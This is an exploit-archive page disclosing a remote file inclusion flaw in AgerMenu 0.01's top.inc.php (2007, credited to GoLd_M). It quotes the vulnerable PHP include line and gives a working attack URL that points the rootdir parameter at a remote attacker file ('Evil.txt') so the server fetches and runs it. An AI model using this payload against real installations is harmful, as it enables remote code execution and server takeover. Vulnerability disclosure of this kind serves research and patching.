[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : AgerMenu 0.01 (top.inc.php rootdir) Remote File Include Vulnerability
# Published : 2007-02-07
# Author : GoLd_M
# Previous Title : LushiWarPlaner 1.0 (register.php) Remote SQL Injection Exploit
# Next Title : WebMatic 2.6 (index_album.php) Remote File Include Vulnerability
===============================================================
Discovered by GolD_M(Mahmnood_ali) & & Contact: HackEr_@W.Cn
===============================================================
URL Script: http://www.chbs.dk/proj/agermenu/agermenu-0.01.tgz
===============================================================
V.CODE: In : [path]/example/inc/top.inc.php
include $rootdir."inc/agermenu.func.php";
===============================================================
Exploit: v.Cc/[path]/example/inc/top.inc.php?rootdir=Evil.txt?
===============================================================
# www.Syue.com [2007-02-07]